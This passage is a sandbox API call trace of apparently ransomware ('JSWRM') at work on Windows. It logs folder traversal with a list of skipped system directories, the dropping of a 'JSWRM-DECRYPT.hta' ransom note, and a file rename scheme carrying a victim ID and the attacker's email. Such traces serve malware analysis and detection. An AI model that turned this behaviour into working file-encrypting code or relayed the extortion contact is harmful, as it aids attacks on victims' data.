hHeap=0x1e0000) returned 1 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0067.894] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.894] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2ca937, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2ca937, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2ca937, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.894] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0067.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0067.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0067.895] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="es-MX", cAlternateFileName="")) returned 1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2=".") returned 1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="..") returned 1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="...") returned 1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="windows") returned -1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="recovery") returned -1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="perflogs") returned -1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="documents and settings") returned 1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="$RECYCLE.BIN") returned 1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="system volume information") returned -1 [0067.895] lstrcmpiW (lpString1="es-MX", lpString2="msocache") returned -1 [0067.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0067.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\jswrm-decrypt.hta")) returned 0xffffffff [0067.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.895] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.895] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.895] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.896] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.896] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.896] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.896] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.896] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.897] CloseHandle (hObject=0x454) returned 1 [0067.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.897] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0067.897] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225328 [0067.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0067.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0067.898] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\jswrm-decrypt.hta")) returned 0x20 [0067.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.898] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f228759, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0067.898] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.898] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05dea14, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f228759, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.898] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.898] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.898] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f228759, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f228759, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f228759, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.898] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240fe8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0067.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0067.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0067.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.899] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2a46df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2a46df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2a46df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0067.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0067.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.899] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0067.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0067.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.900] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10077367668299056) returned 0 [0067.900] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.900] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.900] CloseHandle (hObject=0xffffffff) returned 1 [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0067.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0067.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0067.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0067.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0067.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.900] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\es-MX\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-mx\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.901] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e2a46df, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e2a46df, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e2a46df, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.901] FindClose (in: hFindFile=0x231ac0 | out: hFindFile=0x231ac0) returned 1 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.901] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa05df011, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="et-EE", cAlternateFileName="")) returned 1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2=".") returned 1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="..") returned 1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="...") returned 1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="windows") returned -1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="recovery") returned -1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="perflogs") returned -1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="documents and settings") returned 1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="$RECYCLE.BIN") returned 1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="system volume information") returned -1 [0067.901] lstrcmpiW (lpString1="et-EE", lpString2="msocache") returned -1 [0067.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224e60 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0067.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0067.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.901] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\jswrm-decrypt.hta")) returned 0xffffffff [0067.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0067.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0067.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\et-EE\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.902] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.902] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.903] CloseHandle (hObject=0x454) returned 1 [0067.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0067.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0067.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0067.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0067.904] RtlAllocateHeap 